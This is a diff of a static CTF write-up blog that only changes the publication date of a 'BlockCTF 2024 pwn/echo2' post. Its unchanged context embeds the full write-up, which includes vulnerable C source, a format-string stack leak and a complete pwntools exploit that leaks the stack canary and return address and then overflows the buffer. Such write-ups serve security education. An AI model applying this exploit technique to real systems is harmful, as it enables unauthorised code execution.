timestamp

content/posts/block-ctf-2024-echo2.md

@@ -1,6 +1,6 @@
 +++
 title = 'BlockCTF 2024 - pwn/echo2'
-date = 2024-11-17T22:52:37-05:00
+date = 2024-11-11T20:52:37-05:00
 draft = false
 +++
 

public/index.html

@@ -167,7 +167,7 @@ <h2 class="entry-hint-parent">BlockCTF 2024 - pwn/echo2
     <p>We are given a binary with all protectoins turned on and c source code.
 #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()....</p>
   </div>
-  <footer class="entry-footer"><span title='2024-11-17 22:52:37 -0500 EST'>November 17, 2024</span></footer>
+  <footer class="entry-footer"><span title='2024-11-11 20:52:37 -0500 EST'>November 11, 2024</span></footer>
   <a class="entry-link" aria-label="post link to BlockCTF 2024 - pwn/echo2" href="https://dfoudeh.github.io/posts/block-ctf-2024-echo2/"></a>
 </article>
 

public/index.xml

@@ -6,12 +6,12 @@
     <description>Recent content on CTF Writeups</description>
     <generator>Hugo -- gohugo.io</generator>
     <language>en-us</language>
-    <lastBuildDate>Sun, 17 Nov 2024 22:52:37 -0500</lastBuildDate>
+    <lastBuildDate>Mon, 11 Nov 2024 20:52:37 -0500</lastBuildDate>
     <atom:link href="https://dfoudeh.github.io/index.xml" rel="self" type="application/rss+xml" />
     <item>
       <title>BlockCTF 2024 - pwn/echo2</title>
       <link>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</link>
-      <pubDate>Sun, 17 Nov 2024 22:52:37 -0500</pubDate>
+      <pubDate>Mon, 11 Nov 2024 20:52:37 -0500</pubDate>
       <guid>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</guid>
       <description>We are given a binary with all protectoins turned on and c source code.
 #include &amp;lt;fcntl.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdint.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;unistd.h&amp;gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&amp;#34;flag.txt&amp;#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo().</description>

public/posts/block-ctf-2024-echo2/index.html

@@ -61,8 +61,8 @@
 #include <fcntl.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <unistd.h> void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open("flag.txt", O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()." />
 <meta property="og:type" content="article" />
 <meta property="og:url" content="https://dfoudeh.github.io/posts/block-ctf-2024-echo2/" /><meta property="article:section" content="posts" />
-<meta property="article:published_time" content="2024-11-17T22:52:37-05:00" />
-<meta property="article:modified_time" content="2024-11-17T22:52:37-05:00" />
+<meta property="article:published_time" content="2024-11-11T20:52:37-05:00" />
+<meta property="article:modified_time" content="2024-11-11T20:52:37-05:00" />
 
 <meta name="twitter:card" content="summary"/>
 <meta name="twitter:title" content="BlockCTF 2024 - pwn/echo2"/>
@@ -103,8 +103,8 @@
   "articleBody": "We are given a binary with all protectoins turned on and c source code.\n#include #include #include #include #include void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(\"flag.txt\", O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo(). We can set a breakpoint in do_echo() after printf and enter a format string to leak the canary and an address.\nSending our format string\n%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx We leak out the stack\n5555555592a1.0.7ffff7f8b8e055555555934b.0.2e786c252e786c25.252e786c25786c25.252e786c252e786c6c25786c252e786c.6c252e786c252e78.6c252e786c252e78.786c252e786c2578.786c252e786c252e2e786c25786c252e.2e786c252e786c25.25786c252e786c25.252e786c252e786c.252e786c252e786c6c252e786c25786c.6c252e786c252e78.786c25786c252e78.786c252e786c252e.786c252e786c252e2e786c252e786c25.2e786c252e786c25.252e786c25786c25.786c.00.0.0.0.00.0.0.0.07befa8536e8aba00.7fffffffe338.5555555555b5.5555555555a1.7ffff7dc9e087fffffffe260.7fffffffe338 07befa8536e8aba00 at offset 39 looks like our canary and at offset 41 is the saved RIP. In gdb with the gef extenstoin, we can use the command ‘canary’ to print out the canary and confirm that we have the right one. Similarly we can use ‘info frame’ to see that we have the right RIP.\nThe saved RIP address is main+20. We can calculate the offset between this andress and the start of the print_flag fucntion, which is 908. Putting it all together:\nfrom pwn import * target = remote(\"54.85.45.101\", 8009) # leak canary payload = \"%39$lx\" target.sendline(payload) canary = int(target.recv(16),16) log.info(hex(canary)) # leak RIP payload = \"%41$lx\" target.sendline(payload) rip = int(target.recv(12),16) log.info(hex(rip)) # offset from leak to print_flag = 908 payload = b\"A\" * 264 + p64(canary) + p64(0xdeadbeef) + p64(rip - 908) target.sendline(payload) target.interactive() flag{aslr_and_canari3s_are_n0_match_f0r_l3aky_stacks}\n",
   "wordCount" : "242",
   "inLanguage": "en",
-  "datePublished": "2024-11-17T22:52:37-05:00",
-  "dateModified": "2024-11-17T22:52:37-05:00",
+  "datePublished": "2024-11-11T20:52:37-05:00",
+  "dateModified": "2024-11-11T20:52:37-05:00",
   "mainEntityOfPage": {
     "@type": "WebPage",
     "@id": "https://dfoudeh.github.io/posts/block-ctf-2024-echo2/"
@@ -174,7 +174,7 @@
     <h1 class="post-title entry-hint-parent">
       BlockCTF 2024 - pwn/echo2
     </h1>
-    <div class="post-meta"><span title='2024-11-17 22:52:37 -0500 EST'>November 17, 2024</span>
+    <div class="post-meta"><span title='2024-11-11 20:52:37 -0500 EST'>November 11, 2024</span>
 
 </div>
   </header> 

public/posts/index.html

@@ -143,7 +143,7 @@ <h2 class="entry-hint-parent">BlockCTF 2024 - pwn/echo2
     <p>We are given a binary with all protectoins turned on and c source code.
 #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()....</p>
   </div>
-  <footer class="entry-footer"><span title='2024-11-17 22:52:37 -0500 EST'>November 17, 2024</span></footer>
+  <footer class="entry-footer"><span title='2024-11-11 20:52:37 -0500 EST'>November 11, 2024</span></footer>
   <a class="entry-link" aria-label="post link to BlockCTF 2024 - pwn/echo2" href="https://dfoudeh.github.io/posts/block-ctf-2024-echo2/"></a>
 </article>
 

public/posts/index.xml

@@ -6,12 +6,12 @@
     <description>Recent content in Posts on CTF Writeups</description>
     <generator>Hugo -- gohugo.io</generator>
     <language>en-us</language>
-    <lastBuildDate>Sun, 17 Nov 2024 22:52:37 -0500</lastBuildDate>
+    <lastBuildDate>Mon, 11 Nov 2024 20:52:37 -0500</lastBuildDate>
     <atom:link href="https://dfoudeh.github.io/posts/index.xml" rel="self" type="application/rss+xml" />
     <item>
       <title>BlockCTF 2024 - pwn/echo2</title>
       <link>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</link>
-      <pubDate>Sun, 17 Nov 2024 22:52:37 -0500</pubDate>
+      <pubDate>Mon, 11 Nov 2024 20:52:37 -0500</pubDate>
       <guid>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</guid>
       <description>We are given a binary with all protectoins turned on and c source code.
 #include &amp;lt;fcntl.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdint.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;unistd.h&amp;gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&amp;#34;flag.txt&amp;#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo().</description>

public/sitemap.xml

@@ -3,13 +3,13 @@
   xmlns:xhtml="http://www.w3.org/1999/xhtml">
   <url>
     <loc>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</loc>
-    <lastmod>2024-11-17T22:52:37-05:00</lastmod>
+    <lastmod>2024-11-11T20:52:37-05:00</lastmod>
   </url><url>
     <loc>https://dfoudeh.github.io/</loc>
-    <lastmod>2024-11-17T22:52:37-05:00</lastmod>
+    <lastmod>2024-11-11T20:52:37-05:00</lastmod>
   </url><url>
     <loc>https://dfoudeh.github.io/posts/</loc>
-    <lastmod>2024-11-17T22:52:37-05:00</lastmod>
+    <lastmod>2024-11-11T20:52:37-05:00</lastmod>
   </url><url>
     <loc>https://dfoudeh.github.io/posts/du-ctf-2024-yawa/</loc>
     <lastmod>2024-07-07T10:47:36-04:00</lastmod>